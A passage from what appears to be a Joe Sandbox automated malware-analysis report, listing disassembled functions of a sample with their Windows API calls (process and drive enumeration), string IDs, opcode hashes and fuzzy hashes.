                                                            • Instruction ID: ef9ba1e05760d2a32c1f0cfb810978505a9e69a1cd52394eaba25b94d25c4abf
                                                            • Opcode Fuzzy Hash: b42d5f8031f4ff6b408edb4a7aa524de9eb734c96fcbaa0f4910c5ca4befffbf
                                                            • Instruction Fuzzy Hash: 8791CFFB26C223BCB94291866B54AFAA76EE6C7730B308437F807D6543E3944E4B5171
                                                            Function 076903E9 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 441COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 0f27ec4566915cc82307ed62ff50b67e9df2eefebe6a949be5cd79c91eed168b
                                                            • Instruction ID: 04a6e43112b59a34c9dd85eaac625831f263f8d25560cc852cd1c0b5e56e5a8f
                                                            • Opcode Fuzzy Hash: 0f27ec4566915cc82307ed62ff50b67e9df2eefebe6a949be5cd79c91eed168b
                                                            • Instruction Fuzzy Hash: 709111FB25C223BCBA4291856B14AFAA72EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690463 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 435COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 2e181d08ccd05662e28e301b45b9b5c425748b58b91a24e7f394657c77f2e1ba
                                                            • Instruction ID: 81cffa4c87832098bb08d416b7d5e119c00b0efbcb9706f2878139addbe327fe
                                                            • Opcode Fuzzy Hash: 2e181d08ccd05662e28e301b45b9b5c425748b58b91a24e7f394657c77f2e1ba
                                                            • Instruction Fuzzy Hash: 9B91E2FB25C223BCB94291856B54AFAAB6EE6C7730B308437F807D6542E3944E4F5171
                                                            Function 076903B1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 430COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: fc0d3922382079e372c80cf49fe1eb512ee0e2398e704dceb36e4bc54847b630
                                                            • Instruction ID: 882c5ca4dc92830b3323724cb4426a66f16b4f791f3a9fc64a439c5e5a831d12
                                                            • Opcode Fuzzy Hash: fc0d3922382079e372c80cf49fe1eb512ee0e2398e704dceb36e4bc54847b630
                                                            • Instruction Fuzzy Hash: 669121FB25C222BCBA4291856B54AFAAB6EE6C7730B30843BF407D6542E3944E4F5171
                                                            Function 0769040F Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 426COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 13709432d648b4e73080971a9f39acf9e67008aba5ba0e7aaf34f6a33b3d0bef
                                                            • Instruction ID: 903659756c05d0e987e82024974d98436060856cf3f51942c7b23f9016f5e191
                                                            • Opcode Fuzzy Hash: 13709432d648b4e73080971a9f39acf9e67008aba5ba0e7aaf34f6a33b3d0bef
                                                            • Instruction Fuzzy Hash: 269103F725C223BCB94291856B54AFAAB6EE6C7730B30843BF407D6542E3944E4B5171
                                                            Function 07690436 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 416COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 953c9bcd31b1e84427613b0e84a0639517d80b5fbb0aaa726508fffa1c161d04
                                                            • Instruction ID: 5483e97730aca20a99c8d5d663d247ab582d926664fdf07c1d2db56397e3482f
                                                            • Opcode Fuzzy Hash: 953c9bcd31b1e84427613b0e84a0639517d80b5fbb0aaa726508fffa1c161d04
                                                            • Instruction Fuzzy Hash: A481F4F725C223BCBA4291856B54AFAA76EE6C7730B308437F807D6543E3944E4B5171
                                                            Function 07690452 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 410COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: fef3c56d8d40eb40a28974a88b967edaa5cea8336a441f6ac126c8ec691b16d9
                                                            • Instruction ID: 83ff1e08639812ffcd13aeda043cc522beb164bf428fd85e3a2299e940f0fa79
                                                            • Opcode Fuzzy Hash: fef3c56d8d40eb40a28974a88b967edaa5cea8336a441f6ac126c8ec691b16d9
                                                            • Instruction Fuzzy Hash: C981F2FB25C223BCB94291956B54AFAAB2EE6C7730B308437F807D6543E3944E4B51B1
                                                            Function 07690487 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 394COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 1eed2f9122c6d1d313b7c301397a2883318b9fc7b6b7953f6655640142448958
                                                            • Instruction ID: 765bd12edc1e6ea45f1b25a09a2875e718ee88bfac69f372acd952e196ba890b
                                                            • Opcode Fuzzy Hash: 1eed2f9122c6d1d313b7c301397a2883318b9fc7b6b7953f6655640142448958
                                                            • Instruction Fuzzy Hash: C081F3F725C223BCB94291856B54AFAAB6EE6C7730B308437F807DA543E3944E4B51B1
                                                            Function 076503AA Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 38e201f70c0bb12337c688fb66c6085b2abe70a45847ee4c5d85dde0807aa8df
                                                            • Instruction ID: 34e692967aca45c17a8d3805e2b9bd6f1ae32567045cfad78e64eee14f609dfa
                                                            • Opcode Fuzzy Hash: 38e201f70c0bb12337c688fb66c6085b2abe70a45847ee4c5d85dde0807aa8df
                                                            • Instruction Fuzzy Hash: 265118EB25C121BDB14285A12B68AFB6B7DE5C7730B31C43BFC43D5546E2898E4E6132
                                                            Function 07650433 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: f06231d4ba0e5588f83ec14165768b4ba0df8d6fff56ad8b562b76961907f62e
                                                            • Instruction ID: e164405107c3c842cd2b2fb1f942b77165a5db230ce5443648fccf4629b87249
                                                            • Opcode Fuzzy Hash: f06231d4ba0e5588f83ec14165768b4ba0df8d6fff56ad8b562b76961907f62e
                                                            • Instruction Fuzzy Hash: 9F414CEB25C122BDB14285A12B68AFB676DE5C7730F31843BFC47D5502E2D88A4F6131
                                                            Function 07650380 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 239COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 1a8fd5bfe22fd6047863f4ee78c552dd8749322fb0794efe3641423a9c327c04
                                                            • Instruction ID: 7f57ebc95e46bc0844f36aaf74562165276d4963ee3a749ca0e8829aa030cd3b
                                                            • Opcode Fuzzy Hash: 1a8fd5bfe22fd6047863f4ee78c552dd8749322fb0794efe3641423a9c327c04
                                                            • Instruction Fuzzy Hash: 1A417FEB25C111BDB24285A12B68AFA6B7DE5C7730F31843AFC43D6502E2998F4E6131
                                                            Function 076503DB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 99589c26cf578c9eec77905f143c549bf925e7e706ecf82553190b74c2255473
                                                            • Instruction ID: db49eaecc71a21b22e5742380424f3b2087b24c55c0650f05fd1988adc4e8407
                                                            • Opcode Fuzzy Hash: 99589c26cf578c9eec77905f143c549bf925e7e706ecf82553190b74c2255473
                                                            • Instruction Fuzzy Hash: BC416CEB25C121BDB24285A56B68AFA6B7DE5C7730F31843AFC03D5502E2988A4F6131
                                                            Function 076503F7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 5e75dcdaad26fc400be7fdd52ca25e394f6d2ed4e6fad400e2b35d3b6b491182
                                                            • Instruction ID: 4951fe5b96a84426e0108cbfef92d6256ccec28553033cbca4b3d7f6e8533b87
                                                            • Opcode Fuzzy Hash: 5e75dcdaad26fc400be7fdd52ca25e394f6d2ed4e6fad400e2b35d3b6b491182
                                                            • Instruction Fuzzy Hash: 95416AEB25C121BDB14285A12B68AFA6B6DE5C7730F31843BFC03D5502E6C98B4F6131
                                                            Function 07650416 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: cce054902a9d92514f5989ca838ac85468484e63c6eefe009e7dc8c0343afeb7
                                                            • Instruction ID: 9b14a258588206842c689f40a8a253b642255b47d84e20c87713aaf5b4d9e6f9
                                                            • Opcode Fuzzy Hash: cce054902a9d92514f5989ca838ac85468484e63c6eefe009e7dc8c0343afeb7
                                                            • Instruction Fuzzy Hash: 46415BEB258121BDB14285A12B68AFB6B7EE5C7730B31C43AFC43D5506E6C98E4F6131
                                                            Function 07650456 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 221COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,000000AF), ref: 07650460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557181256.0000000007650000.00000040.00001000.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7650000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 2b87f9ee3cde5e898f02e82731240ad388e10c0f3becfdbceb6dcfbf5a0e8415
                                                            • Instruction ID: ee13d2baf0ef091d7fc47c2b021d90deeb350eb1ccbe803cf51c6cb625eb352d
                                                            • Opcode Fuzzy Hash: 2b87f9ee3cde5e898f02e82731240ad388e10c0f3becfdbceb6dcfbf5a0e8415
                                                            • Instruction Fuzzy Hash: A0416CEB258121BDB14285A12B68AFA6B7EE5C7730B31843BFC03D5502E2C98F4F6131
                                                            Function 076A0161 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5099f1d2ef6285d73526441a71d17d98bde9af5d867ab9e585d6c825e916122
                                                            • Instruction ID: 3095b105c8d5d5163eae29584fec3c6b7d0f36a0bb6a7d701812e5d17a00f12a
                                                            • Opcode Fuzzy Hash: e5099f1d2ef6285d73526441a71d17d98bde9af5d867ab9e585d6c825e916122
                                                            • Instruction Fuzzy Hash: D651E4FB55C262BE710281956B24AFB6B6EE5C7730B308427F803CA642F3954E4F5972
                                                            Function 076A0170 Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f2c678be98560d3b2bce9689d9030536e15fa29c9c55dc0c4305c04627d4843
                                                            • Instruction ID: 54da2f874fa29650eff83e32804c68772688ad1423e2cb9d54e40218041d4bdd
                                                            • Opcode Fuzzy Hash: 2f2c678be98560d3b2bce9689d9030536e15fa29c9c55dc0c4305c04627d4843
                                                            • Instruction Fuzzy Hash: 295105FB55C222BD710291956B54AFB6B6DE5C7730B308427F803C6502F3954E4F5872
                                                            Function 076A01AE Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4e8f1b35e51aba8b295f2ac3431642fce3870d2506db2f5586cf2b3a7ec6964a
                                                            • Instruction ID: 1f8d82f39a84b1370318ab7a1597156b79d3f8c22226860b05c5e6ef0b3a0e99
                                                            • Opcode Fuzzy Hash: 4e8f1b35e51aba8b295f2ac3431642fce3870d2506db2f5586cf2b3a7ec6964a
                                                            • Instruction Fuzzy Hash: BD41BFFB56C222BE710281456B24AFB576EE6D7730B318027F807C6502F3954E4F5872
                                                            Function 076A01BD Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: ed77148cf57f2b31aeee3337287ee499f6b1ad61108324547b6bea36192a09ad
                                                            • Instruction ID: 2587fdc4968712cee58d2201de5b50b9cbde5953eb552d3fae3df70350d073e2
                                                            • Opcode Fuzzy Hash: ed77148cf57f2b31aeee3337287ee499f6b1ad61108324547b6bea36192a09ad
                                                            • Instruction Fuzzy Hash: 9341D2FB56C221BEB10281556B24AFB6B6DE5D7730B31802BF807C6542F3990E4F5972
                                                            Function 076A0237 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e6c3890ffa2d190f8a38897a0cbaf4e5fb75fd74bc46520248fd263227ceb83
                                                            • Instruction ID: 347486186122c45134b253bfdf2832a9c6d3892013fffa824f98a4fd2bf85a4e
                                                            • Opcode Fuzzy Hash: 8e6c3890ffa2d190f8a38897a0cbaf4e5fb75fd74bc46520248fd263227ceb83
                                                            • Instruction Fuzzy Hash: AB4118FB55D252BEB20285516B24AFB6B6DE6D7730B30806BF403C6542F3940E4F4932
                                                            Function 076A01EC Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 10b22dd48e0a37a848b3d9af93a7b80b7359b629f0f970e711747a98f5851f85
                                                            • Instruction ID: c1ba979078f069f36cec42ed8c75c4cc7013bd7d7e9a714fb8aae2256c6bfc1b
                                                            • Opcode Fuzzy Hash: 10b22dd48e0a37a848b3d9af93a7b80b7359b629f0f970e711747a98f5851f85
                                                            • Instruction Fuzzy Hash: 9931E3FB56C222FEB10280556B64AFA6B6DE6D7730F318026F807C6642F3954E4F5872
                                                            Function 076A0224 Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd1162545eebc82af1db49555948c1858d4600c3c6f677ab8783bda561f7ca6f
                                                            • Instruction ID: 2faefefde8e30124b17fd1667ec64f751cbbd076f24abdd92e68c6e980fc90e4
                                                            • Opcode Fuzzy Hash: dd1162545eebc82af1db49555948c1858d4600c3c6f677ab8783bda561f7ca6f
                                                            • Instruction Fuzzy Hash: CA31AEFB56C222FEB10280516B64AFA976DE6D7730F70802AF807D6542F3940E4F4872
                                                            Function 076A022D Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 93f82d8495504bc1155dcd22dc8bdefead879470b5d32ed2a8cec8bde14bd1ac
                                                            • Instruction ID: 47994e6da67431363381efdd8836feb0f949f252f9fc6d10f1f0e5ed7ffb08cd
                                                            • Opcode Fuzzy Hash: 93f82d8495504bc1155dcd22dc8bdefead879470b5d32ed2a8cec8bde14bd1ac
                                                            • Instruction Fuzzy Hash: C031CCFB52C222BEB1028041AB24AFA976DE6D7730B30842BF807C6542F3844E4F4872
                                                            Function 076A0263 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 53888eba8a7d7ba1da45ac21c6787c4af89ec57297f9a19e0b9d2bfada877b16
                                                            • Instruction ID: 764f755de129044cb2362719b3e65f594228d3ebe5f1e31681bf639a4603567f
                                                            • Opcode Fuzzy Hash: 53888eba8a7d7ba1da45ac21c6787c4af89ec57297f9a19e0b9d2bfada877b16
                                                            • Instruction Fuzzy Hash: 0531E5F752C222BEB20281516B24AFA576DE6D7730B31842BF807D6542F3950D4F4971
                                                            Function 076A02D2 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3907777fa33d35d4b3b78122c2d78e055650c2aac3f24dc0fd21a58cc635e971
                                                            • Instruction ID: 51d93b5f307a02e7374594d5f81f62278251383db38b0ca51876b08d2a011a4e
                                                            • Opcode Fuzzy Hash: 3907777fa33d35d4b3b78122c2d78e055650c2aac3f24dc0fd21a58cc635e971
                                                            • Instruction Fuzzy Hash: B231E6FB52C222BEB20285516B64AFA576DE6D7730F31842BF807CA542F3944E4F4972
                                                            Function 076A02F4 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad987db75128fe9bd681d8c4f592d46148455a3573ab9a72107b4cb42ae71c29
                                                            • Instruction ID: 279b77fb0f02822b41fa593a761cafac89390f23f0673b9312b4d0e90996fca0
                                                            • Opcode Fuzzy Hash: ad987db75128fe9bd681d8c4f592d46148455a3573ab9a72107b4cb42ae71c29
                                                            • Instruction Fuzzy Hash: 19318EEB56C122BE71019495AB64AFA576DE5C7730B31842BF807C6542F3854E4F0876
                                                            Function 076A02BC Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 316df45b1dbef49459978f31345700ab9c978e53105bc5e1631470619031fbaa
                                                            • Instruction ID: fd78f2fc71f6b6f85415c3725ac04204ab67695c2252b0492fef5be74f34f6fd
                                                            • Opcode Fuzzy Hash: 316df45b1dbef49459978f31345700ab9c978e53105bc5e1631470619031fbaa
                                                            • Instruction Fuzzy Hash: 5B218CEB96C122BEB1029095AB64AFA576DE5C7B30B31842BF807C6546F3854E4F0872
                                                            Function 076A0306 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f636b65b94102ceae766a05947c61c852a384e2f927637d27b62529f3056bee0
                                                            • Instruction ID: 8ab7010a51d26eaf6b17fc8ac21bafde51ecbc056f790ca1144803b5b49d0fa0
                                                            • Opcode Fuzzy Hash: f636b65b94102ceae766a05947c61c852a384e2f927637d27b62529f3056bee0
                                                            • Instruction Fuzzy Hash: CF2126E791C112BEB2028455AB64AFA576DE5C7730B30C46BF407CA542F3850E4F4932
                                                            Function 076A02E4 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4cf9607908de3a2bd6d1e457cf25cba394515d790304f9dd13c6e21c248c5fc8
                                                            • Instruction ID: 4cffe1f1bb34b2e5a6ef34f3f1c8c71c33e28450b943262aec058e3ed0cebfae
                                                            • Opcode Fuzzy Hash: 4cf9607908de3a2bd6d1e457cf25cba394515d790304f9dd13c6e21c248c5fc8
                                                            • Instruction Fuzzy Hash: F821BCFB66C122BEB1029095BB64AFA576DE6C7730B30842BF807C6542F3940E4F4832
                                                            Function 076A0335 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557281775.00000000076A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76a0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75b7747bd9fa100a40171c414607cc0d558224997c9072d79b0c0a9f68aae32f
                                                            • Instruction ID: 146a4a0584a5efc616464f9ee6609f1ec925be1857ebc4efb25d58f0902a5572
